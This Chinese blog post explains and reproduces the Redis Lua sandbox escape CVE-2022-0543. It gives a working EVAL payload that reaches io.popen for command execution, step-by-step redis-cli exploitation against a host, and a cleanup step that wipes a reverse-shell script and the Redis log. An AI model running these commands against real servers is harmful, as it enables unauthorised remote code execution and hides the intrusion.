Redis沙盒逃逸(CVE-2022-0543)
一.沙箱的含义沙箱是一种安全机制限制程序只能访问特定资源防止恶意操作影响系统。场景沙箱作用浏览器沙箱网页代码只能操作浏览器无法直接读写本地文件游戏沙箱外挂程序无法修改游戏内存Redis Lua 沙箱Lua 脚本无法执行系统命令、访问文件系统关系图物理机├── 容器 ADocker│ └── Redis 进程│ └── Lua 沙箱 ←── 你的漏洞在这层突破│ └── 恶意脚本理论上只能操作 Redis│└── 容器 B其他应用1.什么是redisRedis英文全称是Remote Dictionary Server远程字典服务是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库并提供多种语言的API。与MySQL数据库不同的是Redis的数据是存在内存中的。它的读写速度非常快每秒可以处理超过10万次读写操作。因此redis被广泛应用于缓存另外Redis也经常用来做分布式锁。除此之外Redis支持事务、持久化、LUA 脚本、LRU 驱动事件、多种集群方案。2.春秋这里可以进行ssrf跳转到baidu页面直接使用file://协议进行读取flag3.漏洞复现漏洞原理该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量该变量又允许访问任意 Lua 功能。我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linugnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数即可获得io库再使用其执行命令Redis 5.0.7 的 Lua 沙箱├── 禁用了 io/os 等危险库loadlib 被限制└── 但漏洞package.loadlib() 仍可加载外部动态库攻击路径package.loadlib() → 加载系统 liblua5.1.so → 导出 luaopen_io→ 获得 io.popen() → 执行任意系统命令复现payload:eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return res 0代码片段作用local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io)加载系统 Lua 库获取luaopen_io函数沙箱禁用的危险函数local io io_l()调用函数初始化 IO 模块获得io.popen等危险方法local f io.popen(id, r)执行系统命令id返回文件句柄local res f:read(*a)读取命令全部输出f:close()关闭文件句柄return res将结果返回给 Redis 客户端0声明脚本操作 0 个 Redis 键绕过键名检查修改红色部分就可以执行命令了eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(whoami); local res f:read(*a); f:close(); return res 0关键风险点要素说明无需认证Redis 未设置密码或已认证远程 RCE网络可达即可执行系统命令服务权限通常以redis用户运行但可尝试提权隐蔽性利用 Lua 脚本不写入磁盘二.实战渗透1.信息收集# 确认目标存在且版本 vulnerable redis-cli -h 192.168.40.128 -p 6379 INFO server | grep redis_version # 期望5.0.7 或 5.0.6 等 5.0.8 的版本2.验证漏洞存在redis-cli -h 192.168.40.128 -p 6379 EVAL return test 0 # 确保 EVAL 命令可用Lua 引擎正常3.漏洞利用redis-cli -h 192.168.40.128 -p 6379 EVAL local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return res 04.清理痕迹# 删除临时文件 EVAL ... io.popen(rm -f /tmp/reverse.sh) ... 0 # 清空 Redis 日志如有权限 EVAL ... io.popen(echo /var/log/redis/redis-server.log 2/dev/null) ..

相关新闻

TM4C129微控制器QEI模块配置指南:从正交编码器原理到电机控制实战

TM4C129微控制器QEI模块配置指南:从正交编码器原理到电机控制实战

1. 项目概述与核心价值在电机控制、机器人关节定位或者高精度数控机床的伺服系统中,我们经常需要知道一个旋转轴当前的确切位置和实时转速。靠人工去数圈数显然不现实,而普通的开关或传感器又无法提供连续、带方向的位置信息。这时,正交编码器…

2026/7/23 1:34:54 阅读更多 →
JDK 国内不更新的原因

JDK 国内不更新的原因

1. 法务合规风险极高。2. JDK17/21 是长期免费 LTS,但切换需要整套改造,不是简单替换。3. 国内上线的百万级 Java 系统,全部基于 JDK8 搭建,整套技术栈深度耦合,升级会连锁爆雷。4. 很多自研内部工具、老旧第三方 jar …

2026/7/23 1:33:53 阅读更多 →
2026年主流GEO监测工具测评:四款主流平台综合能力全解析

2026年主流GEO监测工具测评:四款主流平台综合能力全解析

依据 Gartner《2026 年数字营销趋势报告》、易观分析《中国 GEO 行业发展报告 2026》、艾瑞咨询《2026 年生成式 AI 用户行为研究报告》多份权威机构公开数据,当前生成式 AI 已深度重塑用户品牌决策链路:Gartner 调研显示,超 72% 商业决策者、…

2026/7/23 1:33:53 阅读更多 →

最新新闻

蛋白标记优选 P2VP-MAL!多重性能优势全面解析

蛋白标记优选 P2VP-MAL!多重性能优势全面解析

一、P2VP-MAL 产品基础定义与蛋白标记应用背景P2VP-MAL 是以聚乙烯吡啶为主链、末端接枝马来酰亚胺活性基团的阳离子高分子改性材料,同时拥有 P2VP 吡啶环带来的静电结合能力与 MAL 基团对巯基的特异性偶联作用,是多肽、抗体、蛋白定点改性研究的优质高分…

2026/7/23 2:15:08 阅读更多 →
Firefox 153.0发布:新增HDR视频播放等功能,修复安全问题并优化设置!

Firefox 153.0发布:新增HDR视频播放等功能,修复安全问题并优化设置!

New Windows系统支持High Dynamic Range (HDR)视频播放,需在Windows Settings - Display中启用HDR模式,部分笔记本电脑显示器和特定录制视频暂不支持。Containers功能可将在线生活不同部分登录到同一浏览器窗口不同帐户,隔离cookie和广告跟踪…

2026/7/23 2:15:08 阅读更多 →
智能眼镜显示技术转向:双眼单色波导如何实现12小时长续航

智能眼镜显示技术转向:双眼单色波导如何实现12小时长续航

上周,一位做硬件开发的朋友突然问我:“你觉得智能眼镜的显示方案,现在走到哪一步了?” 我愣了一下,因为就在前一天,我刚好在关注 Halliday Gen 2 的一些技术细节。这款眼镜最引人注意的变化,是把…

2026/7/23 2:15:08 阅读更多 →
AI时代前端UI设计的49种风格与实战指南

AI时代前端UI设计的49种风格与实战指南

1. AI时代前端UI设计的变革与挑战在ChatGPT、Midjourney等AI工具爆发的2023年,前端开发者正面临前所未有的界面设计范式转移。传统GUI设计模式与新兴的Conversational UI、Hybrid-UI等概念激烈碰撞,掌握多元化的UI风格已成为现代前端工程师的核心竞争力。…

2026/7/23 2:15:08 阅读更多 →
手机隐私泄露预警:摄像头与麦克风调用图标解析

手机隐私泄露预警:摄像头与麦克风调用图标解析

1. 手机隐私泄露的视觉预警机制当手机屏幕上突然跳出摄像头或麦克风图标时,大多数用户的第一反应往往是困惑而非警觉。这些看似普通的系统提示图标,实际上是移动操作系统为我们筑起的第一道隐私防线。去年第三方安全机构的研究数据显示,平均每…

2026/7/23 2:15:08 阅读更多 →
世界杯西班牙淘汰葡萄牙:C罗告别16强,战术解析与数据复盘

世界杯西班牙淘汰葡萄牙:C罗告别16强,战术解析与数据复盘

世界杯西班牙淘汰葡萄牙:C罗告别16强,真实球迷汇直播间赛后深度解析在刚刚结束的世界杯1/8决赛中,西班牙队通过加时赛的精彩表现以1-0淘汰葡萄牙队,C罗的第五次世界杯之旅就此止步16强。这场比赛不仅是一场技战术的较量&#xff0…

2026/7/23 2:14:08 阅读更多 →

日新闻

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

更多请点击: https://intelliparadigm.com 第一章:从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表) 当AI副业主理人不再仅满足于单次服务交付,而是主动构建可复用、可裂变、可…

2026/7/23 0:00:25 阅读更多 →
AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

更多请点击: https://codechina.net 第一章:AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析 在对2,346篇跨行业AI生成文案的A/B测试数据进行聚类分析后,我们发现&#xff1…

2026/7/23 0:01:26 阅读更多 →
Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具 【免费下载链接】chitchatter Secure peer-to-peer chat that is serverless, decentralized, and ephemeral 项目地址: https://gitcode.com/gh_mirrors/ch/chitchatter Chitchatter是一款革命性的安…

2026/7/23 0:01:26 阅读更多 →

周新闻

Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/22 8:58:19 阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/22 19:43:43 阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/22 12:54:44 阅读更多 →

月新闻